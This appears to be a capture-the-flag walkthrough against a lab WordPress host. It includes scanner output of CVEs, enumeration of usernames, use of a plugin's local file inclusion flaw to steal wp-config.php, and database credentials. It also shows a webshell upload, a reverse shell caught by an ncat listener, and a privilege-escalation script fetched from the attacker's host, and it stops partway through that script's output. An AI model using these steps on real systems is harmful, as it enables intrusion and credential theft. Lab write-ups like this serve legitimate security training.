Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
Reference: https://wpvulndb.com/vulnerabilities/8615
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
Reference: http://seclists.org/fulldisclosure/2016/Sep/6
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
[i] Fixed in: 4.2.10
[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
Reference: https://wpvulndb.com/vulnerabilities/8616
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
[i] Fixed in: 4.2.10
[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 4.2.11
[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
Reference: https://www.mehmetince.net/low-severity-wordpress/
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 4.2.11
[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
Reference: https://wpvulndb.com/vulnerabilities/8719
Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 4.2.11
[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
Reference: https://wpvulndb.com/vulnerabilities/8720
Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 4.2.11
[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 4.2.11
[!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
Reference: https://wpvulndb.com/vulnerabilities/8729
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
[i] Fixed in: 4.2.12
[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 4.2.12
[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
Reference: https://wpvulndb.com/vulnerabilities/8765
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
Reference: http://seclists.org/oss-sec/2017/q1/563
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 4.2.13
[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
Reference: https://wpvulndb.com/vulnerabilities/8766
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 4.2.13
[!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
Reference: https://wpvulndb.com/vulnerabilities/8768
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
[i] Fixed in: 4.2.13
[!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
Reference: https://wpvulndb.com/vulnerabilities/8770
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
Reference: http://seclists.org/oss-sec/2017/q1/562
Reference: https://hackerone.com/reports/153093
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
[i] Fixed in: 4.2.13
[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://core.trac.wordpress.org/ticket/25239
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
Reference: https://wpvulndb.com/vulnerabilities/8815
Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
[i] Fixed in: 4.2.15
[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
Reference: https://wpvulndb.com/vulnerabilities/8816
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
[i] Fixed in: 4.2.15
[!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
Reference: https://wpvulndb.com/vulnerabilities/8817
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
[i] Fixed in: 4.2.15
[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
Reference: https://wpvulndb.com/vulnerabilities/8818
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
[i] Fixed in: 4.2.15
[!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
Reference: https://wpvulndb.com/vulnerabilities/8819
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
Reference: https://hackerone.com/reports/203515
Reference: https://hackerone.com/reports/203515
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
[i] Fixed in: 4.2.15
[!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
Reference: https://wpvulndb.com/vulnerabilities/8820
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
[i] Fixed in: 4.2.15
[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8905
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
[i] Fixed in: 4.2.16
[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
Reference: https://wpvulndb.com/vulnerabilities/8906
Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
Reference: https://wpvulndb.com/vulnerabilities/8905
[i] Fixed in: 4.7.5
[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8910
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41398
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
[i] Fixed in: 4.2.16
[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
Reference: https://wpvulndb.com/vulnerabilities/8911
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41457
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
[i] Fixed in: 4.2.16
[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
Reference: https://wpvulndb.com/vulnerabilities/8941
Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
Reference: https://twitter.com/ircmaxell/status/923662170092638208
Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
[i] Fixed in: 4.2.17
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.2.18
[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.2.18
[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.2.18
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9006
Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/ticket/42720
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
Reference: https://wpvulndb.com/vulnerabilities/9021
Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
Reference: https://github.com/quitten/doser.py
Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
[!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
Reference: https://wpvulndb.com/vulnerabilities/9053
Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
[i] Fixed in: 4.2.20
[!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
Reference: https://wpvulndb.com/vulnerabilities/9054
Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
[i] Fixed in: 4.2.20
[!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
Reference: https://wpvulndb.com/vulnerabilities/9055
Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
[i] Fixed in: 4.2.20
[!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
Reference: https://wpvulndb.com/vulnerabilities/9100
Reference: https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
Reference: http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
Reference: https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
Reference: https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
Reference: https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
[i] Fixed in: 4.2.21
[+] WordPress theme in use: bhost - v1.2.9
[+] Name: bhost - v1.2.9
| Last updated: 2018-01-10T00:00:00.000Z
| Location: https://192.168.43.10:12380/blogblog/wp-content/themes/bhost/
| Readme: https://192.168.43.10:12380/blogblog/wp-content/themes/bhost/readme.txt
[!] The version is out of date, the latest version is 1.4.0
| Style URL: https://192.168.43.10:12380/blogblog/wp-content/themes/bhost/style.css
| Theme Name: BHost
| Theme URI: Author: Masum Billah
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
| Author: Masum Billah
| Author URI: http://getmasum.net/
[+] Enumerating plugins from passive detection ...
[+] No plugins found passively
[+] Enumerating usernames ...
[+] We identified the following 10 users:
+----+---------+-----------------+
| ID | Login | Name |
+----+---------+-----------------+
| 1 | john | John Smith |
| 2 | elly | Elly Jones |
| 3 | peter | Peter Parker |
| 4 | barry | Barry Atkins |
| 5 | heather | Heather Neville |
| 6 | garry | garry |
| 7 | harry | harry |
| 8 | scott | scott |
| 9 | kathy | kathy |
| 10 | tim | tim |
+----+---------+-----------------+
[+] Finished: Tue Sep 25 15:55:42 2018
[+] Elapsed time: 00:00:01
[+] Requests made: 77
[+] Memory used: 34.57 MB
A little search came up with the result that the advanced-video-embed-embed-videos-or-playlists - v1.0 is vulnerable to LFI:
[GandoPC 192.168.43.10]# getsploit advanced-video-embed-embed-videos-or-playlists 1 Total found exploits: 3 Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit+AND+advanced-video-embed-embed-videos-or-playlists+1 +----------------------+--------------------------------+----------------------------------------------------+ | ID | Exploit Title | URL | +======================+================================+====================================================+ | 1337DAY-ID-25160 | Advanced Webhost Billing | https://vulners.com/zdt/1337DAY-ID-25160 | | | System (AWBS) 2.9.6 - Multiple | | | | Vulnerabilities | | +----------------------+--------------------------------+----------------------------------------------------+ | 1337DAY-ID-24987 | WordPress Advanced Video 1.0 | https://vulners.com/zdt/1337DAY-ID-24987 | | | Plugin - Local File Inclusion | | +----------------------+--------------------------------+----------------------------------------------------+ | PACKETSTORM:136566 | WordPress Advanced Video 1.0 | https://vulners.com/packetstorm/PACKETSTORM:136566 | | | Local File Inclusion | | +----------------------+--------------------------------+----------------------------------------------------+
I used this POC in order to get wp-config.php file:
wp-config.php file is saved as a .jpeg inside /uploads directory:
I downloaded the file and read its content:
[GandoPC 192.168.43.10]# wget --no-check-certificate https://192.168.43.10:12380/blogblog/wp-content/uploads/606078739.jpeg --2018-09-27 20:01:55-- https://192.168.43.10:12380/blogblog/wp-content/uploads/606078739.jpeg Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt' Connecting to 192.168.43.10:12380... connected. WARNING: The certificate of 192.168.43.10 is not trusted. WARNING: The certificate of 192.168.43.10 hasn't got a known issuer. The certificate's owner does not match hostname 192.168.43.10 HTTP request sent, awaiting response... 200 OK Length: 3042 (3.0K) [image/jpeg] Saving to: 606078739.jpeg 606078739.jpeg 100%[=====================================================================================================>] 2.97K --.-KB/s in 0.003s 2018-09-27 20:01:55 (1.11 MB/s) - 606078739.jpeg saved [3042/3042]
MySQL database username and password were found:
Port 3306 check:
Attempt to access MySQL database with creds (U:root,P:plbkac) and upload a webshell:
Webshell:
Ifconfig output and setup of reverse python shell to my host:
Reverse python shell:
[GandoPC 192.168.43.10]# ncat -lvnp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.43.10.
Ncat: Connection from 192.168.43.10:55812.
/bin/sh: 0: can't access tty; job control turned off
$ ifconfig
enp0s3 Link encap:Ethernet HWaddr 08:00:27:c5:84:c5
inet addr:192.168.43.10 Bcast:192.168.43.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:705681 errors:172 dropped:0 overruns:0 frame:0
TX packets:590590 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:160697530 (160.6 MB) TX bytes:261275471 (261.2 MB)
Interrupt:9 Base address:0xd000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:549 errors:0 dropped:0 overruns:0 frame:0
TX packets:549 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:56456 (56.4 KB) TX bytes:56456 (56.4 KB)
$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd;ls
/var/www/https/blogblog/wp-content/uploads
606078739.jpeg
Gandoshellllll.php
Privilege escalation:
Basic enumeration using linuxprivchecker.py and cronjob manipulation:
$ wget 192.168.43.3//Tools/linuxprivchecker/linuxprivchecker.py
--2018-09-25 20:25:18-- http://192.168.43.3//Tools/linuxprivchecker/linuxprivchecker.py
Connecting to 192.168.43.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25304 (25K)
Saving to: 'linuxprivchecker.py'
0K .......... .......... .... 100% 429K=0.06s
2018-09-25 20:25:19 (429 KB/s) - 'linuxprivchecker.py' saved [25304/25304]
$ ls -l
total 36
-rw-r--r-- 1 www-data www-data 3042 Sep 25 17:04 606078739.jpeg
-rw-rw-rw- 1 mysql mysql 39 Sep 25 19:14 Gandoshellllll.php
-rw-r--r-- 1 www-data www-data 25304 Sep 16 15:14 linuxprivchecker.py
$ chmod +x linuxprivchecker.py
$ python ./linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016
[+] Hostname
red.initech
[+] Operating System
__..--''\
__..--'' \
__..--'' __..--''
__..--'' __..--'' |
\ o __..--''____....----""
\__..--''\
| \
+----------------------------------+
+----------------------------------+
[*] GETTING NETWORKING INFO...
[+] Interfaces
enp0s3 Link encap:Ethernet HWaddr 08:00:27:c5:84:c5
inet addr:192.168.43.10 Bcast:192.168.43.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:705807 errors:172 dropped:0 overruns:0 frame:0
TX packets:590713 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:160733420 (160.7 MB) TX bytes:261288145 (261.2 MB)
Interrupt:9 Base address:0xd000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:558 errors:0 dropped:0 overruns:0 frame:0
TX packets:558 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:56996 (56.9 KB) TX bytes:56996 (56.9 KB)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:666 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 192.168.43.10:55812 192.168.43.3:4444 ESTABLISHED 8570/python
tcp 0 1 127.0.0.1:55426 127.0.0.1:631 SYN_SENT -
tcp6 0 0 :::139 :::* LISTEN -
tcp6 0 0 :::53 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::12380 :::* LISTEN -
tcp6 0 0 :::12380 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
tcp6 86 0 192.168.43.10:12380 192.168.43.3:33287 CLOSE_WAIT -
udp 0 0 192.168.43.255:137 0.0.0.0:* -
udp 0 0 192.168.43.10:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 192.168.43.255:138 0.0.0.0:* -
udp 0 0 192.168.43.10:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 0.0.0.0:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:69 0.0.0.0:* -
udp6 0 0 :::53 :::* -
[+] Route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.43.0 * 255.255.255.0 U 0 0 0 enp0s3
[*] GETTING FILESYSTEM INFO...
[+] Mount results
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,nosuid,relatime,size=494820k,nr_inodes=123705,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=102416k,mode=755)
/dev/sda1 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd,nsroot=/)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer,nsroot=/)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb,nsroot=/)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct,nsroot=/)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio,nsroot=/)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices,nsroot=/)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids,nsroot=/)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset,nsroot=/)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event,nsroot=/)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio,nsroot=/)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory,nsroot=/)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=0,minproto=5,maxproto=5,direct)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
mqueue on /dev/mqueue type mqueue (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
tmpfs on /run/lxcfs/controllers type tmpfs (rw,relatime,size=100k,mode=700)
memory on /run/lxcfs/controllers/memory type cgroup (rw,relatime,memory,nsroot=/)
blkio on /run/lxcfs/controllers/blkio type cgroup (rw,relatime,blkio,nsroot=/)
perf_event on /run/lxcfs/controllers/perf_event type cgroup (rw,relatime,perf_event,nsroot=/)
cpuset on /run/lxcfs/controllers/cpuset type cgroup (rw,relatime,cpuset,nsroot=/)
pids on /run/lxcfs/controllers/pids type cgroup (rw,relatime,pids,nsroot=/)
devices on /run/lxcfs/controllers/devices type cgroup (rw,relatime,devices,nsroot=/)
net_cls,net_prio on /run/lxcfs/controllers/net_cls,net_prio type cgroup (rw,relatime,net_cls,net_prio,nsroot=/)
cpu,cpuacct on /run/lxcfs/controllers/cpu,cpuacct type cgroup (rw,relatime,cpu,cpuacct,nsroot=/)
hugetlb on /run/lxcfs/controllers/hugetlb type cgroup (rw,relatime,hugetlb,nsroot=/)
freezer on /run/lxcfs/controllers/freezer type cgroup (rw,relatime,freezer,nsroot=/)
name=systemd on /run/lxcfs/controllers/name=systemd type cgroup (rw,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd,nsroot=/)
lxcfs on /var/lib/lxcfs type fuse.lxcfs (rw,nosuid,nodev,relatime,user_id=0,group_id=0,allow_other)
tmpfs on /run/user/1013 type tmpfs (rw,nosuid,nodev,relatime,size=102416k,mode=700,uid=1013,gid=1013)
tmpfs on /run/user/1028 type tmpfs (rw,nosuid,nodev,relatime,size=102416k,mode=700,uid=1028,gid=1028)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
[+] fstab entries
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
#
# / was on /dev/sda1 during installation
UUID=9bdd8a90-41cc-484f-8c75-0249b9103a31 / ext4 errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=9584ec4a-8708-4802-96e6-9e3067074554 none swap sw 0 0
[+] Scheduled cron jobs
